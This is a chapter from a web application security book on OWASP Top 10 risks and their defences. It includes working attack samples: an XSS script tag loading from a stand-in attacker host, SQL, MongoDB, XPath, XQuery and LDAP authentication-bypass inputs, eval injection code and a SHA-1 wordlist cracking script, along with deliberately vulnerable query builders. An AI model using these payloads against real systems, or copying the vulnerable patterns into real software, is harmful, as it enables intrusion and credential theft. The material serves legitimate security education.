Take the results from the higher level Asset Identification in the 30,000’ View chapter of Fascicle 0. Remove any that are not applicable, add any relevant from previous chapters, add any newly discovered. Here are some to get you started:
The following are the OWASP Top 10 vulnerabilities for 2003, 2004, 2007, 2010, 2013 and 2017.
As you can see there are some vulnerabilities that we are just not getting better at removing. I’ve listed them in order of most consistent to not quite as consistent:
“Using Components with Known Vulnerabilities” is one that I think we are going to see get worse before it gets better, because we are consuming a far greater amount of free and open source software. With the growth of free and open source package repositories, such as NPM, NuGet and various others, we are now consuming a far greater number of packages without vetting them before including them in our projects. This is why I’ve devoted a set of sections (“Consuming Free and Open Source”) within this chapter to this problem. There are also sections devoted to this topic in the VPS and Network chapters titled “Using Components with Known Vulnerabilities”. It’s not just a problem with software. We are trying to achieve more, with less of our own work, so in many cases we are blindly trusting other sources. From the attacker’s perspective, this is an excellent vector to compromise for maximum exploitation.
I see this as an indirect risk to the asset of web application ownership. The same sections in the VPS and Network chapters may also be worth reading if you have not already, as there is some crossover.
Not being able to introspect your application at any given time, or to know what its health status is, is not a comfortable place to be in, and there is no reason you should be there.
Can you tell at any point in time if someone or something is:
How easy is it for you to notice:
The risks here are around accepting untrusted data and parsing it, rendering it, executing it or storing it verbatim to have the same performed on it at a later stage.
Untrusted territory is usually a location that is not close to your back-end executing code. If your back-end is in a cloud that you do not control, i.e. not your hardware and not your staff running it, then you have serious potential issues there as well that you may want to address. I’ve discussed in depth what these issues are in the previous chapters and how to mitigate the risks. Anywhere outside of your local network is untrusted. Inside your local network is semi-trusted. The amount of trust you afford depends on the relationships you have with your staff, how large your staff base is, how large your network is, how APs are managed and many of the other issues I have discussed in the previous chapters, especially Network, and Physical and People from Fascicle 0. The closer data gets to the executing back-end code, the less untrustworthy the territory should be. Of course there are many exceptions to this rule as well.
So I could say, just do not trust anyone or anything, but there comes a time and a place that you have to afford trust. Just keep it as close to the back-end executing code as possible.
The risk arises whenever you parse, render or execute data that you cannot trust, that is, data accepted from an unknown user, whether it arrives through a browser or from someone intercepting communications somewhere along untrusted territory.
This overly complex environment leads to confusion and a perfect haven for hiding malicious code chunks.
Below are a few widely accepted techniques that we need to apply to any untrusted data before it travels through your system to be stored or hydrated.
Decide what input is valid by way of a white list (a list of input characters that are allowed to be received). Often each input field will have a different white list. Validation is binary: the data is either allowed to be received or it is not. If it is not allowed, then it is rejected. It is usually not too complicated to work out what is good and what is not, and thus rejected. There are a few strategies to use for white listing, such as the actual collection of characters or using regular expressions.
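As a minimal sketch of white list validation using regular expressions, the following assumes two hypothetical input fields (`username` and `age`) and patterns chosen purely for illustration. Real white lists depend on each field’s business requirements.

```javascript
// Hypothetical per-field white lists. The field names and patterns are
// illustrative assumptions, not taken from any particular application.
const whiteLists = new Map([
  // Letters, digits, underscore and hyphen, 3 to 20 characters.
  ['username', /^[A-Za-z0-9_-]{3,20}$/],
  // Digits only, 1 to 3 characters.
  ['age', /^[0-9]{1,3}$/]
]);

// Validation is binary: the value is either accepted or rejected.
function isValidInput(field, value) {
  const pattern = whiteLists.get(field);
  // Unknown fields and non-string values are rejected outright.
  if (pattern === undefined || typeof value !== 'string') return false;
  return pattern.test(value);
}

console.log(isValidInput('username', 'kim_c'));                     // true
console.log(isValidInput('username', '<script>alert(1)</script>')); // false
```

Keeping one white list per field makes it obvious which fields have no validation rule at all, because those are rejected by default.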
There are other criteria that you can validate against as well, such as:
Filtering is where some data can pass through (be received) and some is captured by the filter element (thou shalt not pass). OWASP hosts the seminal XSS cheat sheet donated by RSnake, which has many tests you can use to check your vulnerability stance to XSS exploitation. This is highly recommended.
Sanitisation of input data is where the input data, whether it is in your white list or not, is accepted and transformed into a medium that is no longer dangerous. It will probably go through validation first. The reason you sanitise character signatures (which may be more than single characters, that is, character combinations) that are not in your white list is as a defence in depth strategy. The white list may change in the future due to a change in business requirements, and the developer may forget to revise the sanitisation routines. Always think of any security measure as standing on its own when you create it, but standing alongside many other security measures once done.
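To make the idea of transforming input into a harmless medium concrete, here is a minimal sketch that encodes the characters significant to HTML. The function name is hypothetical, and the sketch only covers the HTML element content context. Other execution contexts (attributes, JavaScript, URLs, CSS) need their own encoding.

```javascript
// Characters that are significant in HTML, mapped to their entity encodings.
const htmlEntities = {
  '&': '&amp;',
  '<': '&lt;',
  '>': '&gt;',
  '"': '&quot;',
  "'": '&#x27;'
};

// Hypothetical helper: accepts any input and transforms it so that a
// browser renders it as text rather than interpreting it as markup.
function sanitiseForHtml(untrusted) {
  return String(untrusted).replace(/[&<>"']/g, (character) => htmlEntities[character]);
}

console.log(sanitiseForHtml('<script>alert("x")</script>'));
// &lt;script&gt;alert(&quot;x&quot;)&lt;/script&gt;
```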
The following hands on hack demonstrates what an XSS attack is and provides a little insight into some of the damage that it can cause.
An XSS attack is one in which untrusted data enters a web application, usually through a web request, and is not stopped by validation, filtering or sanitisation. The data is then at some point sent to someone using the same web application without being validated, filtered or sanitised.
One way this can be carried out trivially is to simply buy an ad and have that injected into the end user’s browser. The malicious code can be easily hidden by simply changing additional scripts that are fetched once live, or even by fetching a script that fetches a different script under the attacker’s control.
The main two different types of XSS are Stored/Persistent or Type I and Reflected/Non-Persistent or Type II.
Stored attacks are where the injected code is sent to the server and stored in a medium that the web application uses to retrieve it again to send to another user.
Reflected attacks use the web application in question as a proxy. When a user makes a request, the injected code travels from another medium through the web application (hence the reflecting) and to the end user. From the browser’s perspective, the injected code came from the web application that the user made a request to.
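The reflection can be sketched with a deliberately vulnerable rendering function. Everything here is hypothetical (the function name, the markup and the `attacker.example` URL). The point is only that the request data comes back in the response untouched.

```javascript
// Hypothetical, deliberately vulnerable rendering function: the query taken
// from the request is concatenated into the response without being
// validated, filtered or sanitised.
function renderSearchPage(query) {
  return '<h1>Search</h1><p>You searched for: ' + query + '</p>';
}

// A benign request is reflected back as plain text.
const benignPage = renderSearchPage('holistic infosec');

// A crafted request (for example a link the target was tricked into
// following) is reflected back as markup that the browser will execute.
const hostilePage = renderSearchPage('<script src="https://attacker.example/hook.js"></script>');

console.log(benignPage);
console.log(hostilePage);
```

A stored attack differs only in that the hostile string is saved first and rendered to other users later.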
The following attack was the first one of five that I demonstrated at WDCNZ in 2015. The attack after this one was a credential harvest based on a spoofed website that hypothetically was fetched due to a spear phishing attack. That particular attack can be found in the “Spear Phishing” section of the People chapter in Fascicle 0.
Theoretically in order to get to the point where you carry out this attack, you would have already been through several stages first. If you are carrying out a penetration testing engagement, it is likely you would have been through the following:
If you are working within a development team you may have found out some other way that your project was vulnerable to XSS.
However you got to this point, you are going to want to exhibit the fault. One of the most effective ways to do this is by using BeEF. BeEF clearly shows what is possible when you have an XSS vulnerability in scope and is an excellent tool for effortlessly demonstrating the severity of the fault to all team members and stakeholders.
One of BeEF’s primary reasons to exist is to exploit the fact that many security philosophies seem to forget how easy it is to go straight through hardened network perimeters and attack the soft mushy insides of a sub network, as discussed in the Fortress Mentality section of the Physical chapter in Fascicle 0. Exposing XSS faults is one of BeEF’s attributes.
You can find the video of how this attack is played out at http://youtu.be/92AWyUfJDUw.
This type of attack depends on a fraudulent web resource, be it a website, email, instant message, or program, that causes the target’s web browser to perform an unintentional action on a website that the target is currently authenticated with.
CSRF attacks target functionality that changes state on the server (for example via POST, PUT or DELETE requests) on a website that the target is currently authenticated with: requests such as changing the target’s credentials, making a purchase, or moving money at their bank. Forcing the target to retrieve data does not help the attacker, because the response goes to the target rather than to the attacker.
If you are using cookies (authentication that the browser automatically sends from the client) for storage of client-side session artefacts, CSRF is your main concern, but XSS is also a possible attack vector.
The target needs to submit the request either intentionally or unintentionally. The request could appear to the target as any action. For example:
<iframe>with a form and a script block inside
For No. 1 above, the action attribute of the form that the target submits could point to the website that the target is already authenticated with, thus a fraudulent request is issued from a web page seemingly unrelated to the website that the target is already authenticated with. This can be seen in the second example below on line 4. The browser plays its part and sends the session Id stored in the cookie. NodeGoat has an excellent example of how this plays out:
The code below can be found at https://github.com/OWASP/NodeGoat/:
The below attack code can be found at the NodeGoat tutorial for CSRF, along with the complete example that ckarande crafted, and an accompanying tutorial video of how the attack plays out:
No. 2 above is similar to No. 1, but the target does not have to action anything once the fraudulent web page is loaded. The script block submits the form automatically, thus making the request to the website that the target is already authenticated with, the browser again playing its part in sending the session Id stored in the cookie:
Injection occurs when untrusted data is sent to an interpreter as part of a command or query. The attacker’s hostile data can cause the interpreter to execute commands that it otherwise would not, or to access data without proper authorization.
In order for injection attacks to be successful, untrusted data must get past validation, filtering and sanitisation (or these must be missing altogether) before it reaches the interpreter.
Injection defects are often easy to discover simply by examining the code that deals with untrusted data, including internal data. These same defects are often harder to discover when black-box testing, either manually or via fuzzers. Defects can range from trivial to complete system compromise.
As part of the discovery stage, the attacker can test their queries, and start to build up a picture of the underlying structure they are attacking, with any number of useful on-line query test tools, such as freeformatter.com. This allows the attacker to make as little noise as possible against the target itself.
One of the simplest and quickest vulnerabilities to fix is SQL Injection, yet it is still top of the hit lists. I am going to hammer this home some more. Also check out the podcast I hosted with Haroon Meer as guest on Network Security for Software Engineering Radio. Haroon discussed using SQLi for data exfiltration.
There are two main problems here.
NoSQL data stores often provide greater performance and scaling benefits, but in terms of security, are disadvantaged due to far fewer relational and consistency checks.
Because there are so many types of NoSQL data store, crafting the attacks is often implementation specific, and because of that, the countermeasures are also implementation specific, making it even more work to provide a somewhat secure environment for your untrusted data to pass through. It often feels like there is no safe passage.
I cannot possibly cover all of the types of NoSQL data store, so the below is an example using MongoDB.
A typical SQL query used to select a user based on their username and password might look like the following:
If the $username and $password fields were not properly validated, filtered and sanitised, an attacker could supply
as the username and the resulting query would look like:
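As a hypothetical illustration of how such a query gets rewritten, the sketch below builds the SQL by string concatenation. The table name, column names and the `admin' --` payload are assumptions made for this example, not necessarily the ones the attacker would use.

```javascript
// Deliberately vulnerable: untrusted values are concatenated straight into
// the SQL text. Table and column names are assumptions for illustration.
function buildSqlLoginQuery(username, password) {
  return "SELECT * FROM users WHERE username = '" + username +
    "' AND password = '" + password + "'";
}

// Legitimate input produces the query the developer intended.
console.log(buildSqlLoginQuery('kim', 's3cret'));
// SELECT * FROM users WHERE username = 'kim' AND password = 's3cret'

// A classic payload closes the string early and comments out the rest,
// so the password check is never evaluated by the database.
console.log(buildSqlLoginQuery("admin' --", 'anything'));
// SELECT * FROM users WHERE username = 'admin' --' AND password = 'anything'
```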
The equivalent of a MongoDB query could be:
One way an attacker could attempt to bypass the password if the untrusted data was not being validated would be to supply a username of:
and a password of:
The resulting query would then look like:
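A minimal sketch of this kind of bypass follows. It does not use a real MongoDB driver: `matchesQuery` is a tiny hypothetical stand-in that understands only equality and `$gt`, and the user record and request body are assumptions made for illustration.

```javascript
// Deliberately vulnerable: values from the parsed request body are placed
// into the query object without checking that they are strings.
function buildMongoLoginQuery(body) {
  return { username: body.username, password: body.password };
}

// Hypothetical stand-in for a document store's matcher. It supports only
// equality and the $gt comparison operator.
function matchesQuery(document, query) {
  return Object.entries(query).every(([field, condition]) => {
    if (condition !== null && typeof condition === 'object' && '$gt' in condition) {
      return document[field] > condition.$gt;
    }
    return document[field] === condition;
  });
}

const storedUsers = [{ username: 'admin', password: 'a-stored-password-value' }];

// The attacker sends an object instead of a string for the password.
const attackBody = JSON.parse('{"username": "admin", "password": {"$gt": ""}}');
const wrongGuessBody = JSON.parse('{"username": "admin", "password": "wrong"}');

const attackMatches = storedUsers.filter((user) => matchesQuery(user, buildMongoLoginQuery(attackBody)));
const guessMatches = storedUsers.filter((user) => matchesQuery(user, buildMongoLoginQuery(wrongGuessBody)));

console.log(attackMatches.length); // 1
console.log(guessMatches.length);  // 0
```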
The $gt comparison operator is used here to select those documents where the value of the password is greater than "", which always results in true because empty passwords are not permitted. Check the NodeGoat tutorial for additional information.
The following functions are easily exploited by an attacker by simply supplying the code they want to execute as a string of text input:
The eval function executes the string of code it is passed with the privileges of the caller.
The setTimeout and setInterval functions allow you to pass a string of code as the first argument, which is compiled and executed on timer expiration (with setTimeout), and at intervals (with setInterval).
The Function constructor takes an arbitrary number of string arguments which are used as the formal parameter names within the function body that the constructor creates. The last argument passed to the Function constructor is also a string, but it contains the statements that are to be executed as the Function object that is returned.
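The behaviour described above can be sketched as follows. The `untrustedInput` strings stand in for text an attacker might supply through a form field, and the property names set on `globalThis` are hypothetical markers used only to show that the supplied code ran.

```javascript
// eval: the string is executed as code with the privileges of the caller.
const untrustedInput = "globalThis.injectedByEval = 'attacker code ran'";
eval(untrustedInput);
console.log(globalThis.injectedByEval); // attacker code ran

// Function constructor: the leading string arguments become the formal
// parameter names, and the last string becomes the function body.
const add = new Function('a', 'b', 'return a + b');
console.log(add(2, 3)); // 5

// When that last string is attacker controlled, the attacker chooses what
// the returned Function object does.
const untrustedBody = "globalThis.injectedByFunction = true; return 'done'";
const hostile = new Function(untrustedBody);
console.log(hostile()); // done

// Browsers also accept a string as the first argument of setTimeout and
// setInterval (Node.js rejects a string here), so it is left commented out:
// setTimeout("alert('string compiled and run on timer expiration')", 1000);
```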
The purposely vulnerable Node web application NodeGoat provides some simple examples in the form of executable code, including some absolute bare minimum countermeasures, and a tutorial with videos of exploiting Command Injection in the form of a Denial of Service (DoS), by passing
through some input fields of the Web UI. It also covers discovery of the names of the files on the target web server’s file system:
The attacker can take this further by writing new files and executing files on the server.
Many web applications take untrusted data, often from HTTP requests, and pass this data directly to the Operating System, its programs, or even other systems, often by APIs, which is now addressed by the OWASP Top 10 A10 Underprotected APIs.
Also check out the Additional Resources chapter for command injection attack techniques.
XML injection techniques usually consist of a discovery stage followed by full exploitation if successful:
]]>allowing an attacker to form executable code
and witnessing how the parser deals with the data.
There are a number of XML attack categories exploitable via injection. They target weaknesses such as the following, which Adam Bell presented at the OWASP New Zealand Day conference in 2017 that I helped to run. Adam’s talk was called “XML Still Considered Dangerous”:
Check out Adam’s slide-deck at the OWASP NZ Day wiki for some interesting examples.
There is a lot that can go wrong in XSLT, the following is a collection of some of the vulnerabilities to be aware of:
Similarly to generic injection, when XPath incorporates untrusted data that has not been validated, filtered and sanitised based on the execution context in question, the intended logic of the query can be modified. Sanitisation is discussed in the “What is Sanitisation” section of the Lack of Input Validation, Filtering and Sanitisation section of Identify Risks. This allows an attacker to inject purposely malformed data into a website, then, by making educated guesses based on what is returned, including the returned data and any error messages, build a picture of how the XML structure looks. As with XML Injection, the attacker will usually carry out this discovery stage followed by full exploitation if successful.
Although this attack technique is similar to SQLi, XPath has no provision for commenting out tails of expressions:
XPath is a standards based language. Unlike SQL, its syntax is implementation independent, which allows attacks to be automated across many targets that use user input to query XML documents.
Unlike SQL, where specific commands and queries are run as specific users, and thus the principle of least privilege can be applied to any given command or query based on the user running it, XPath has no notion of Access Control Lists (ACLs). This means that a query can access every part of the XML document. So for example, if user credentials are being stored in an XML document, they can be retrieved and allow the attacker to elevate their privileges to those of other users, perhaps administrators if the administrators’ credentials are stored in the XML document.
Let us use the following XML document for examples:
Blind injection is a technique used in many types of injection. A blind injection attack is used where the attacker does not know what the underlying query, or in the case of XPath, XML document looks like, and/or the feedback from the application reveals little detail in terms of data or error messages. Often booleanised queries and/or XML Crawling are used to facilitate blind injection attacks.
Booleanised Queries are those that return very granular true/false information based on very small amounts of data supplied by the attacker.
The following XPath query returns the first character of the first child node (no matter what it is called) of the first User:
The following XPath query returns the length of the fourth element (no matter what it is called) of the first User:
XML Crawling allows the attacker to get to know what the XML document structure looks like.
For example, the following reveals that the number of Users is 2:
The following reveals that the length of the value at the fourth position of the child node (no matter what it is called) of the first User is in fact 9 characters long. Is the Password nine characters long? True.
The following query can be used to confirm the first character of the fourth child node (no matter what it is called) of the first User:
Check out the OWASP XML Crawling documentation for further details. The queries in the OWASP documentation did not work for me, which is why I have supplied ones that do.
Booleanised queries can be very good for automated attacks. Usually many of these granular tests will need to be performed, but because they are so small, an attacker can aggregate them, making them very versatile.
Continuing on: If our target application contains logic to retrieve the account type so long as the user provides their username and password, that logic may look similar to the following, once the legitimate administrator has entered their credentials:
If the application does not take the countermeasures discussed, and the attacker enters the following:
' or '1'='1
' or '1'='1
Then the above query will look more like the following:
Although the attacker has not supplied a valid Password, according to the XPath query they are still authenticated, because the query will always evaluate to true. This is called authentication bypass for obvious reasons. You may notice that this attack looks very similar to many SQLi attacks.
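The bypass can be sketched by building the XPath expression with string concatenation. The element names (`User`, `Username`, `Password`, `Account`) and the shape of the expression are assumptions made for illustration. Only the `' or '1'='1` input comes from the text above.

```javascript
// Deliberately vulnerable: untrusted values are concatenated into the XPath
// expression. Element names are assumptions for illustration.
function buildAccountTypeQuery(username, password) {
  return "string(//User[Username/text()='" + username +
    "' and Password/text()='" + password + "']/Account/text())";
}

const injection = "' or '1'='1";
const injectedQuery = buildAccountTypeQuery(injection, injection);

console.log(injectedQuery);
// string(//User[Username/text()='' or '1'='1' and Password/text()='' or '1'='1']/Account/text())
```

Because `and` binds more tightly than `or` in XPath, the predicate reduces to a chain of `or` terms ending in `'1'='1'`, which is true for every User node.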
The available XPath functions and XSLT specific additions to XPath are documented at Mozilla Developer Network (MDN).
Technically, XPath is used to select parts of an XML document and has no provision for updating. That said, command injection can be used to modify data that XPath returns. Standard language libraries usually provide functionality for modifying XML documents, along with the XML Data Modification Language (DML) that we will discuss in the next section.
XQuery, being a superset of XPath, suffers from the same vulnerabilities as XPath, plus those of its SQL-like FOR, LET, WHERE, ORDER BY, RETURN (FLWOR) expression abilities. Hopefully it comes as no surprise that the attack vectors are a combination of those discussed in XPath Injection and SQLi. The canonical example is provided below thanks to projects.webappsec.org:
If the query to retrieve the user bobm was using a string literal from the user’s input (bobm), it may look similar to the following:
An attacker could exploit the query by providing:
something" or ""="
which would form the following query:
which upon execution would yield all of the
Something else to keep in mind is that XQuery also has an extension called the XML Data Modification Language (DML), which is commonly used to update (insert, delete and replace value of) XML documents.
The same generic injection information is applicable to LDAP.
Successful LDAP injection attacks could result in the granting of permissions to unauthorised queries and/or adding, deleting or modifying of entries in the LDAP tree. Because LDAP is used extensively for user authentication, this is a particularly viable area for attackers.
LDAP uses Polish notation (PN), also known as normal Polish notation (NPN) or simply prefix notation, which has the distinguishing feature of placing operators to the left of their operands.
One of the canonical examples is a web application that takes the user’s credentials and verifies their authenticity. If successful, the user is authenticated and granted access to specific resources.
The LDAP filter used to check whether the supplied username and password of a user is correct, might look similar to the following:
With user input:
the search filter would look similar to the following:
The (&) we used that did not contain any embedded filters is called the LDAP true filter, and will always match any target entry. This allows the attacker to compare a valid
true, the attacker can subsequently use any password as only the first filter is processed by the LDAP server.
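As a hedged sketch of how the true filter ends up inside the search filter, the following builds an LDAP filter by string concatenation. The attribute names (`uid`, `userPassword`) and the input values are assumptions for illustration, and whether the trailing text is ignored depends on the LDAP server in use.

```javascript
// Deliberately vulnerable: untrusted values are concatenated into the
// prefix-notation filter. Attribute names are assumptions for illustration.
function buildLdapFilter(username, password) {
  return '(&(uid=' + username + ')(userPassword=' + password + '))';
}

// Legitimate input: both conditions sit inside a single AND filter.
console.log(buildLdapFilter('kim', 's3cret'));
// (&(uid=kim)(userPassword=s3cret))

// Injected input: the username closes its own condition and appends the
// true filter, so the first complete filter is (&(uid=kim)(&)) and the
// password condition falls outside of it.
console.log(buildLdapFilter('kim)(&)', 'anything'));
// (&(uid=kim)(&))(userPassword=anything))
```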
Lack of captchas is a risk, but so are captchas themselves…
What is the problem here? What are we trying to stop?
Bots submitting. Whatever it is, whether advertising, creating an unfair advantage over real humans, link creation in an attempt to increase SEO, or malicious code insertion, you are more than likely not interested in accepting it.
What do we not want to block?
People submitting genuinely innocent input. If a person is prepared to fill out a form manually, even if it is spam, then a person can view the submission and very quickly delete the validated, filtered and possibly sanitised message.
Also consider reviewing the Storage of Secrets subsections in the Cloud chapter.
The reason I have tagged this as moderate is because if you take the countermeasures, it doesn’t have to be a disaster.
The New Zealand Intelligence Service recently told Prime Minister John Key that this was one of the 6 top threats facing New Zealand. “Cyber attack or loss of information and data, which poses financial and reputational risks.”
There are many examples of data-store compromise happening on a daily basis. If organisations took the advice I outline in the countermeasures section, millions of users would not have their identities stolen. Sadly the advice is rarely followed. The Ashley Madison debacle is a good example. Ashley Madison’s entire business relied on its commitment to keep its clients’ (37 million of them) data secret, and to provide discretion and anonymity.
“Before the breach, the company boasted about airtight data security but ironically, still proudly displays a graphic with the phrase “trusted security award” on its homepage”
“We worked hard to make a fully undetectable attack, then got in and found nothing to bypass…. Nobody was watching. No security. Only thing was segmented network. You could use Pass1234 from the internet to VPN to root on all servers.”
“Any CEO who isn’t vigilantly protecting his or her company’s assets with systems designed to track user behavior and identify malicious activity is acting negligently and putting the entire organization at risk. And as we’ve seen in the case of Ashley Madison, leadership all the way up to the CEO may very well be forced out when security isn’t prioritized as a core tenet of an organization.”
Other notable data-store compromises were LinkedIn, with 6.5 million user accounts compromised and 95% of the users’ passwords cracked in days. Why so fast? Because they used simple hashing, specifically SHA-1. eBay, with 145 million active buyers, was another. Many others are coming to light regularly.
Are you using well salted, high quality key derivation functions (KDFs) for all of your sensitive data? Are you making sure you are notifying your customers about using high quality passwords? Are you informing them what a high quality password is? Consider checking new user credentials against a list of the most frequently used and insecure passwords collected. I discussed Password Lists in the Tooling Setup chapter. You could also use wordlists targeting the most commonly used passwords, or create an algorithm that works out what an easy to guess password looks like, and inform the user that it would be easy to guess by an attacker.
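A minimal sketch of such a check follows. The short list of common passwords, the minimum length of 10 and the repeated-character rule are all assumptions for illustration. In practice you would load a full password list and tune the rules to your own policy.

```javascript
// Tiny illustrative sample. A real check would load a full wordlist of the
// most frequently used passwords.
const commonPasswords = new Set(['123456', 'password', 'qwerty', 'letmein', 'pass1234']);

// Hypothetical policy: the minimum length of 10 is an assumption.
const minimumLength = 10;

function isEasyToGuess(candidate) {
  const normalised = candidate.toLowerCase();
  // Appears in the list of frequently used passwords.
  if (commonPasswords.has(normalised)) return true;
  // Too short to resist an off-line wordlist or brute force attack.
  if (normalised.length < minimumLength) return true;
  // A single character repeated, such as "aaaaaaaaaaaa".
  if (new Set(normalised).size === 1) return true;
  return false;
}

console.log(isEasyToGuess('Pass1234'));                     // true
console.log(isEasyToGuess('aaaaaaaaaaaa'));                 // true
console.log(isEasyToGuess('correct horse battery staple')); // false
```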
Remember we covered Password Profiling in the People chapter, where we essentially made good guesses, both manually and with the use of profiling tools, around the end users’ passwords, and then fed the short-list to a brute forcing tool. Here we already have the password hashes. We just need to find the source passwords that created the hashes. This is where cracking comes in.
When an attacker acquires a data-store or domain controller dump of hashed passwords, they need to crack the hashes in order to get the passwords. The attacker will find or create a suitable list of possible passwords. The tool used will then create a hash of each of these words, using the same hashing algorithm that was used on the dump of hashes, and compare each dumped hash with the hashes just created. When a match is found, we know that the word in our wordlist used to create the hash that matches the dumped hash is in fact a legitimate password.
A smaller wordlist is going to take less time to create the hashes. As this is often an off-line attack, a larger wordlist is often preferred over a smaller one because the number of generated hashes will be greater, which when compared to the dump of hashes means the likelihood of a greater number of matches is increased.
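The cracking process described above can be sketched with Node.js’s built-in `crypto` module. Unsalted SHA-1 is used only because it is the algorithm mentioned in the LinkedIn example. The dump and wordlist here are made up, and the dump is generated in place so that the sketch is self-contained.

```javascript
const { createHash } = require('crypto');

// Hash a candidate word with the same algorithm used on the dump.
function sha1Hex(text) {
  return createHash('sha1').update(text, 'utf8').digest('hex');
}

// In a real attack the dump comes from the compromised data-store.
// Here it is generated so the sketch is self-contained.
const dumpedHashes = ['letmein', 'Pass1234', 'x9$Lq!vT2#mZ'].map(sha1Hex);

// Made up wordlist of possible passwords.
const wordlist = ['123456', 'password', 'letmein', 'Pass1234'];

function crackHashes(hashes, words) {
  // Hash every word once, then look each dumped hash up in the result.
  const hashToWord = new Map(words.map((word) => [sha1Hex(word), word]));
  return hashes
    .filter((hash) => hashToWord.has(hash))
    .map((hash) => ({ hash, password: hashToWord.get(hash) }));
}

const cracked = crackHashes(dumpedHashes, wordlist);
console.log(cracked.map((entry) => entry.password)); // [ 'letmein', 'Pass1234' ]
```

The third password is not in the wordlist, so its hash stays uncracked, which is the trade-off between wordlist size and match count described above.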
As part of the hands on hack in the SQLi section, we obtained the password hashes via SQL injection from the target web application DVWA (part of the OWASP Broken Web Application suite (VM)). We witnessed how an attacker could obtain the passwords from the hashed values retrieved from the database.
Also brought to light by the OWASP Top 10 risks “No. 2 Broken Authentication and Session Management”.
With this category of attacks, your attacker could be either someone you do or do not know. Possibly someone already with an account, an insider maybe, looking to take the next step which could be privilege escalation or even just alteration so that they have access to different resources by way of acquiring other accounts. Some possible attack vectors could be:
In the Countermeasures section I go through some mature and well tested libraries and other technologies, and details around making them fit into a specific business architecture.
Consider what data could be exposed from any of the accounts and how this could be used to gain a foot hold to launch further alternative attacks. Each step allowing the attacker to move closer to their ultimate target, the ultimate target being something hopefully discussed during the Asset Identification phase or taking another iteration of it as you learn and think of additional possible targeted assets.
Often the line between the following two concepts gets blurred, sometimes because where one starts and the other ends is not absolute or clear, and sometimes intentionally. Neither helps newcomers, or even those used to working with the concepts, get to grips with which is which and what the responsibilities of each include.
Authentication is the process of determining whether an entity (be it a person or something else) is who or what it claims to be.
Being authenticated, means the entity is known to be who or what it/he/she claims to be.
Authorisation is the process of verifying that an entity (usually the one requesting, be it a person or something else) has the right to a resource or to carry out an action, then granting the permission requested.
Being authorised, means the entity has the power or right to certain privileges.
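To keep the two concepts apart, here is a minimal sketch in which each is a separate function. The in-memory session and permission stores, the token values and the action names are all hypothetical and exist only to show where one responsibility ends and the other begins.

```javascript
// Hypothetical in-memory stores, for illustration only.
const sessions = new Map([['token-abc', 'alice'], ['token-xyz', 'bob']]);
const permissions = new Map([
  ['alice', new Set(['read:report', 'delete:report'])],
  ['bob', new Set(['read:report'])]
]);

// Authentication: is the entity who or what it claims to be?
function authenticate(sessionToken) {
  return sessions.get(sessionToken) ?? null;
}

// Authorisation: does the authenticated entity have the right to carry
// out this action?
function authorise(user, action) {
  const granted = permissions.get(user);
  return granted !== undefined && granted.has(action);
}

function handleRequest(sessionToken, action) {
  const user = authenticate(sessionToken);
  if (user === null) return 'rejected: not authenticated';
  if (!authorise(user, action)) return 'rejected: not authorised';
  return 'allowed: ' + user + ' may ' + action;
}

console.log(handleRequest('bogus', 'read:report'));       // rejected: not authenticated
console.log(handleRequest('token-xyz', 'delete:report')); // rejected: not authorised
console.log(handleRequest('token-abc', 'delete:report')); // allowed: alice may delete:report
```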
Don’t build your own authentication, authorisation or session management system unless it’s your core business. It’s too easy to get things wrong and you only need one defect in order to be compromised. Leave it to those that have already done it or do it as part of their core business and have already worked through the defects.
The things I see that seem to get many developers into trouble:
There are so many use cases with the wider cryptography topic. There is no substitute for learning about your options, which to use in any given situation and how to use them.
Little trust should be placed in the browser and how it generally fails to manage attacks due to the complexities discussed in both the Risks and Countermeasures sections of “Lack of Input Validation, Filtering and Sanitisation”. The browser has enough trouble getting all the technologies to work together and inside of each other, let alone stopping malicious code fragments that do work from working. As most web developers have worked out, the browser is purposely designed to make even syntactically incorrect code work correctly.
The browser was designed to download and run potentially malicious, untrusted code from arbitrary locations on the fly. The browser in most cases doesn’t know what malicious code is, and often the first payload is not malicious, but simply fetches other code that may fetch other code that eventually will be malicious.
Web development is hard. Web security is harder still.
What’s also really good to see is SJCL pushing consumers down the right path and issuing warnings around primitives that have issues. For example the warning against using CBC. I discuss this further in the risks that solution causes section.
Other than the countermeasure, this is probably the best offering we have for crypto in the browser. It has sensible defaults, good warnings, and not too many options to understand in order to make good choices. This is one of those libraries that guides the developer down the right path.
Encrypts your plain text using the AES block cipher with a choice of cipher modes CCM or OCB2. AES is the industry-standard block cipher for this purpose, and one of the better choices for crypto in the browser if it must be done. AES comes in three forms: 128 bit (very efficient), 192 bit and 256 bit. The modes of operation that SJCL has provided for use with AES are the following two Authenticated Encryption with Associated Data (AEAD) ciphers:
This is where A9 (Using Components with Known Vulnerabilities) of the 2017 OWASP Top 10 comes in.
We are consuming far more free and open source libraries than we ever have before. Much of the code we are pulling into our projects is never intentionally used, but is still adding surface area for attack. Much of it:
There are some very sobering statistics, also detailed in “the morning paper” by Adrian Colyer, on how many defective libraries we are depending on. We are all trying to get things done faster, and that in many cases means consuming someone else’s work rather than writing our own code.
Many vulnerabilities can hide in these external dependencies. It is not just one attack vector any more, it provides the opportunity for many vulnerabilities to be sitting waiting to be exploited. If you do not find and deal with them, I can assure you, someone else will.
Running any type of script from non local sources without first downloading and inspecting it, and checking for known vulnerabilities, has the potential to cause massive damage. For example, it could destroy or modify your systems and any others that may be reachable, send sensitive information to an attacker, or carry out many other types of malicious activity.
There is a good example of what the Insecure Direct Object References risk looks like in the NodeGoat web application. Check out the tutorial, along with the video of how the attack is played out, along with the sample code and recommendations of how to fix.
The web application is being attacked with unusual requests.
Attackers probe for many types of weaknesses within the application. When they think they have found a flaw, they attempt to learn from it and refine their attack technique.
Attackers have budgets just like application developers/defenders. As they get closer to depleting their budget without gaining a foothold, they become more impulsive, start making more noise, and mistakes creep into their techniques, which makes it even more obvious that their probes are of a malicious nature.
Every decision made in a project needs to factor in security. Just as with other non functional requirements, retrofitting means undoing what you’ve already done and rebuilding. Maintaining the mindset of going back later and bolting on security doesn’t work.
Often I’ll hear people say “well we haven’t been hacked so far”. This shows a lack of understanding. I usually respond with “That you are aware of”. Many of the most successful attacks go unnoticed. Even if you or your organisation haven’t been compromised, businesses are changing all the time, along with the attack surface and your assets. It’s more a matter of when than if.
One of the additional resources useful at this stage is the MS Application Threats and Countermeasures.
Also refer to the “Lack of Visibility” section in the VPS chapter, where I discuss a number of tried and tested solutions. Much of what we discuss here will also make use of, and in some cases (such as logging and monitoring) depend on, components being set up from the VPS chapter’s Countermeasures sections within the Lack of Visibility sections.
As Bruce Schneier said: “Detection works where prevention fails and detection is of no use without response”. This leads us to application logging.
